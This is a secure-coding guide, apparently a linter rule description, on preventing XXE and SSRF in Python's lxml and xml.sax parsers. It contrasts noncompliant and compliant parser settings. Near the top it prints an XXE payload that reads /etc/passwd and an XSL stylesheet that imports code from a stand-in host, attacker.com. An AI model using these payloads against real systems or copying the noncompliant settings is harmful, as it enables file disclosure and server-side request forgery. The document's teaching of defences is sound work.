The XML specification allows the use of entities that can be internal or external (file system access, network access, ...), which can lead to vulnerabilities such as confidential file disclosure or server-side request forgery (SSRF).
For example, in this XML document, an external entity reads the /etc/passwd file:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<to>&xxe;</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
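To see what a parser setting changes, the following minimal sketch parses a copy of the document above with Python's standard xml.sax module, with external general entities explicitly disabled. It assumes Python 3. A temporary file holding fake passwd-style content stands in for /etc/passwd so the demo does not depend on the host, and TextCollector and parse_without_external_entities are hypothetical names.

```python
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import feature_external_ges


class TextCollector(xml.sax.ContentHandler):
    """Hypothetical handler: records all character data it receives."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(xml_path):
    """Parse xml_path with external general entities explicitly disabled."""
    parser = xml.sax.make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, False)
    parser.parse(xml_path)
    return "".join(handler.chunks)


with tempfile.TemporaryDirectory() as tmp:
    # Stand-in for /etc/passwd (assumption: fake content, not a real system file).
    secret = Path(tmp, "secret.txt")
    secret.write_text("root:x:0:0:root:/root:/bin/bash\n")
    doc = Path(tmp, "xxe.xml")
    doc.write_text(
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE test [\n"
        f'<!ENTITY xxe SYSTEM "{secret.as_uri()}">\n'
        "]>\n"
        "<note><to>&xxe;</to><from>Jani</from></note>\n"
    )
    text = parse_without_external_entities(str(doc))

print("root:x:0:0" in text)  # False: the external entity was not expanded
print("Jani" in text)        # True: ordinary content is still parsed
```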
In this XSL document, network access is allowed, which can lead to SSRF vulnerabilities:
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:import href="http://www.attacker.com/evil.xsl"/>
  <xsl:include href="http://www.attacker.com/evil.xsl"/>
  <xsl:template match="/">
    &content;
  </xsl:template>
</xsl:stylesheet>
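Besides denying network access in the XSLT processor, an application might flag stylesheets that pull code from remote URLs before using them. The sketch below is a hypothetical pre-check built on the standard library's xml.etree.ElementTree; the function name remote_stylesheet_refs and the list of URL schemes it treats as remote are assumptions. It only sees static xsl:import and xsl:include hrefs, not network access made by other means such as the XSLT document() function, so it can complement processor-level controls but not replace them.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
REMOTE_SCHEMES = ("http", "https", "ftp")  # assumption: what counts as "remote"


def remote_stylesheet_refs(xsl_text):
    """Return href values of xsl:import / xsl:include that point at a network URL."""
    root = ET.fromstring(xsl_text)
    refs = []
    for tag in ("import", "include"):
        # ElementTree uses the {namespace}localname form for qualified tags.
        for elem in root.iter(f"{{{XSL_NS}}}{tag}"):
            href = elem.get("href", "")
            if urlparse(href).scheme in REMOTE_SCHEMES:
                refs.append(href)
    return refs


stylesheet = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:import href="http://www.attacker.com/evil.xsl"/>
  <xsl:include href="local.xsl"/>
  <xsl:template match="/"/>
</xsl:stylesheet>"""

print(remote_stylesheet_refs(stylesheet))
# ['http://www.attacker.com/evil.xsl']
```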
It is recommended to disable access to external entities and network access in general.
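A stricter variant of this recommendation, used by some hardened XML libraries, is to reject any document that contains a DOCTYPE declaration at all, since entities can only be declared in a DTD. The sketch below illustrates that technique (a swap-in, not something the rule itself requires) with the standard library's low-level xml.parsers.expat parser; DTDForbidden and parse_rejecting_dtd are hypothetical names. It only suits inputs that legitimately never carry a DTD.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Hypothetical exception: the document carried a DOCTYPE declaration."""


def parse_rejecting_dtd(xml_bytes):
    """Parse xml_bytes with pyexpat, refusing any document that declares a DTD.

    Without a DTD there is nowhere to declare entities, so no external entity
    (file or network) can be referenced.
    """
    parser = xml.parsers.expat.ParserCreate()

    def start_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = start_doctype
    parser.Parse(xml_bytes, True)


parse_rejecting_dtd(b"<note><from>Jani</from></note>")  # accepted: no DTD

try:
    parse_rejecting_dtd(
        b'<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b"<note><to>&xxe;</to></note>"
    )
    verdict = "accepted"
except DTDForbidden as exc:
    verdict = str(exc)

print(verdict)  # DOCTYPE 'test' is not allowed
```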
Noncompliant code example with the lxml module:
from lxml import etree

parser = etree.XMLParser() # Noncompliant: before lxml 5.0, resolve_entities defaults to True
tree1 = etree.parse('ressources/xxe.xml', parser)
root1 = tree1.getroot()
parser = etree.XMLParser(resolve_entities=True) # Noncompliant
tree1 = etree.parse('ressources/xxe.xml', parser)
root1 = tree1.getroot()
parser = etree.XMLParser(resolve_entities=True) # Noncompliant
treexsd = etree.parse('ressources/xxe.xsd', parser)
rootxsd = treexsd.getroot()
schema = etree.XMLSchema(rootxsd)
treexsl = etree.parse('ressources/xxe.xsl', parser)
rootxsl = treexsl.getroot()
ac = etree.XSLTAccessControl(read_network=True, write_network=False) # Noncompliant: read_network=True authorizes network access
transform = etree.XSLT(rootxsl, access_control=ac)
xml.sax module:
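import xml.sax
from xml.sax.handler import feature_external_ges

parser = xml.sax.make_parser()
myHandler = MyHandler() # MyHandler: an application-defined xml.sax.ContentHandler subclass
parser.setContentHandler(myHandler)
parser.setFeature(feature_external_ges, True) # Noncompliant
parser.parse("ressources/xxe.xml")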
Compliant solution with the lxml module:
Disable resolve_entities and network access:
from lxml import etree

parser = etree.XMLParser(resolve_entities=False, no_network=True) # Compliant
tree1 = etree.parse('ressources/xxe.xml', parser)
root1 = tree1.getroot()
parser = etree.XMLParser(resolve_entities=False) # Compliant: no_network defaults to True
treexsd = etree.parse('ressources/xxe.xsd', parser)
rootxsd = treexsd.getroot()
schema = etree.XMLSchema(rootxsd) # Compliant
parser = etree.XMLParser(resolve_entities=False) # Compliant
treexsl = etree.parse('ressources/xxe.xsl', parser)
rootxsl = treexsl.getroot()
ac = etree.XSLTAccessControl.DENY_ALL # Compliant
transform = etree.XSLT(rootxsl, access_control=ac) # Compliant
To prevent XXE attacks with the xml.sax module (note that xml.sax is not recommended for other security reasons unrelated to XXE):
import xml.sax
from xml.sax.handler import feature_external_ges

parser = xml.sax.make_parser()
myHandler = MyHandler() # MyHandler: an application-defined xml.sax.ContentHandler subclass
parser.setContentHandler(myHandler)
parser.parse("ressources/xxe.xml") # Compliant: since Python 3.7.1, the SAX parser no longer processes general external entities by default
parser.setFeature(feature_external_ges, False) # Compliant
parser.parse("ressources/xxe.xml")
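As defence in depth for the xml.sax case, a parser can also be given an entity resolver that refuses every external entity, so that re-enabling feature_external_ges by mistake fails loudly instead of fetching a file or URL. This is a minimal sketch, assuming the default expat-based parser returned by xml.sax.make_parser(); DenyExternalEntities and hardened_parser are hypothetical names, and raising ValueError is an arbitrary choice.

```python
import io
import xml.sax
from xml.sax.handler import EntityResolver, feature_external_ges, feature_external_pes


class DenyExternalEntities(EntityResolver):
    """Hypothetical resolver that refuses every external entity it is asked for."""

    def resolveEntity(self, publicId, systemId):
        raise ValueError(f"external entity refused: {systemId!r}")


def hardened_parser(handler):
    """Hypothetical factory: a SAX parser with external entities switched off."""
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, False)  # external general entities
    parser.setFeature(feature_external_pes, False)  # external parameter entities
    # Backstop: if the features above are ever re-enabled, resolution still fails.
    parser.setEntityResolver(DenyExternalEntities())
    return parser


payload = b"""<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://www.attacker.com/evil">]>
<note><to>&xxe;</to></note>"""

# Normal use: the entity reference is skipped and nothing is fetched.
hardened_parser(xml.sax.ContentHandler()).parse(io.BytesIO(payload))

# Simulate a later misconfiguration that turns external entities back on.
parser = hardened_parser(xml.sax.ContentHandler())
parser.setFeature(feature_external_ges, True)
try:
    parser.parse(io.BytesIO(payload))
    outcome = "parsed"
except ValueError as exc:
    outcome = str(exc)

print(outcome)  # external entity refused: 'http://www.attacker.com/evil'
```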